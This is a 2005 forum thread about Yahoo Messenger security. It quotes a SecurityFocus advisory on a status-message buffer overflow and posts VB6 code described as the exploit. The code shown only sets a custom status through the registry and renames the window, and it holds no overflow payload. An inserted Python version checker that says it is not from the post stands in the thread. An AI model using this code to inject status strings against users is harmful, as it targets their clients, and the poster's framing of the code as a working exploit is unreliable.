Yahoo Messenger Exploits? - Does anyone know of any exploits in YMSG
tansqrx
post Apr 25 2005, 09:21 PM, Post #1
Super Member, Group: [HOSTED], Posts: 521, Joined: 25-April 05, Member No.: 4,374

Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?
saxsux
post Apr 26 2005, 06:59 AM, Post #2
Bursting with vegany goodness!, Group: Members, Posts: 342, Joined: 8-April 05, From: Norwich, UK, Member No.: 3,753

I don't use Yahoo Messenger much, Google offer a much better alternative - Hello! www.hello.com
tansqrx
post Apr 28 2005, 07:40 PM, Post #3
Super Member, Group: [HOSTED], Posts: 521, Joined: 25-April 05, Member No.: 4,374

Google? I'm talking about Yahoo Messenger not the search engine.
tansqrx
post Apr 28 2005, 07:45 PM, Post #4
Super Member, Group: [HOSTED], Posts: 521, Joined: 25-April 05, Member No.: 4,374

Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus.

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12750

QUOTE
It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.

It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.

An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.


QUOTE
bugtraq id 12750
object 
class Boundary Condition Error
cve CVE-MAP-NOMATCH

remote Yes
local No
published Mar 08, 2005
updated Mar 08, 2005
vulnerable Yahoo! Messenger 4.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.0.1232
Yahoo! Messenger 5.0.1065
Yahoo! Messenger 5.0.1046
Yahoo! Messenger 5.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.5.1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6.0.1358
Yahoo! Messenger 5.6.0.1356
Yahoo! Messenger 5.6.0.1355
Yahoo! Messenger 5.6.0.1351
Yahoo! Messenger 5.6.0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0.0.1921
Yahoo! Messenger 6.0.0.1750
Yahoo! Messenger 6.0.0.1643
Yahoo! Messenger 6.0

not vulnerable


Does anyone have additional info on this exploit? Is it still valid?

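A small defender-side check, added here as an example and not code from the post or from SecurityFocus: it parses the affected-version entries quoted above from BID 12750 and reports whether a given Yahoo! Messenger build appears in that list. Treating a bare entry such as "6.0" as covering the whole 6.0 product line is my assumption, as is the entry list being complete.

```python
import re

# Affected-version entries as quoted in the BID 12750 summary above.
# The parser also tolerates the "5.0 .1232" spacing the forum rendering
# put inside some version numbers.
BID_12750_AFFECTED = [
    "Yahoo! Messenger 4.0",
    "Yahoo! Messenger 5.0.1232", "Yahoo! Messenger 5.0.1065",
    "Yahoo! Messenger 5.0.1046", "Yahoo! Messenger 5.0",
    "Yahoo! Messenger 5.5.1249", "Yahoo! Messenger 5.5",
    "Yahoo! Messenger 5.6.0.1358", "Yahoo! Messenger 5.6.0.1356",
    "Yahoo! Messenger 5.6.0.1355", "Yahoo! Messenger 5.6.0.1351",
    "Yahoo! Messenger 5.6.0.1347", "Yahoo! Messenger 5.6",
    "Yahoo! Messenger 6.0.0.1921", "Yahoo! Messenger 6.0.0.1750",
    "Yahoo! Messenger 6.0.0.1643", "Yahoo! Messenger 6.0",
]


def parse_version(text: str) -> tuple:
    """Turn 'Yahoo! Messenger 5.6 .0.1358' or '5.6.0.1358' into (5, 6, 0, 1358)."""
    m = re.search(r"(\d+(?:\s*\.\s*\d+)+)\s*$", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in re.split(r"\s*\.\s*", m.group(1)))


# Set of affected version tuples, both exact builds and bare product lines.
AFFECTED = {parse_version(entry) for entry in BID_12750_AFFECTED}


def is_affected(installed: str) -> bool:
    """True if the exact build is listed, or (assumption) its major.minor
    product line appears as a bare entry such as 'Yahoo! Messenger 6.0'."""
    v = parse_version(installed)
    return v in AFFECTED or v[:2] in AFFECTED


if __name__ == "__main__":
    for build in ("5.0.1232", "6.0.0.2000", "7.0.0.1"):
        print(build, "affected" if is_affected(build) else "not listed")
```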
tansqrx
post Apr 28 2005, 07:54 PM, Post #5
Super Member, Group: [HOSTED], Posts: 521, Joined: 25-April 05, Member No.: 4,374

This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snippet. I know that most exploits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problem is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sense to them?

CODE
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5
Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186
Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5
Public Const VK_SPACE = &H20
Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public Const WM_SYSCOMMAND = &H112
Const ERROR_SUCCESS = 0&
Const REG_SZ = 1
Const REG_DWORD = 4
Public Enum HKeyTypes
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
HKEY_PERFORMANCE_DATA = &H80000004
End Enum

' Write Status into the first custom status message slot of the logged-in
' profile, then post WM_COMMAND (control ID 388) to the main window so
' Messenger re-reads it.
Sub YStatus(Status As String)
    Dim Name As String
    Dim X As Long
    Name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")
    Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" & Name & "\Custom Msgs", "1", Status)
    On Error Resume Next
    X = FindWindow("YahooBuddyMain", vbNullString)
    SendMessageLong X, WM_COMMAND, 388, 1&
End Sub

' Replace the caption of the Messenger main window.
Sub YCap(cap As String)
    Dim yahoobuddymain As Long
    yahoobuddymain = FindWindow("yahoobuddymain", vbNullString)
    Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)
End Sub

' Read a REG_SZ value; returns "" if the key, value or type does not match.
Public Function GetString(hKey As HKeyTypes, strPath As String, strValue As String) As String
    Dim keyhand As Long
    Dim lResult As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    Dim lValueType As Long
    If RegOpenKey(hKey, strPath, keyhand) <> ERROR_SUCCESS Then Exit Function
    ' First call with a NULL buffer only reports the type and required size.
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
    If lResult = ERROR_SUCCESS And lValueType = REG_SZ Then
        strBuf = String(lDataBufSize, " ")
        lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
        If lResult = ERROR_SUCCESS Then
            ' Cut the string at the terminating NUL the API writes into the buffer.
            intZeroPos = InStr(strBuf, Chr$(0))
            If intZeroPos > 0 Then
                GetString = Left$(strBuf, intZeroPos - 1)
            Else
                GetString = strBuf
            End If
        End If
    End If
    RegCloseKey keyhand
End Function

' Create (or open) a key and store strData as a REG_SZ value.
Public Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)
    Dim keyhand As Long
    Dim r As Long
    r = RegCreateKey(hKey, strPath, keyhand)
    If r <> ERROR_SUCCESS Then Exit Sub
    ' cbData for REG_SZ must include the terminating NUL, hence Len + 1.
    r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData) + 1)
    r = RegCloseKey(keyhand)
End Sub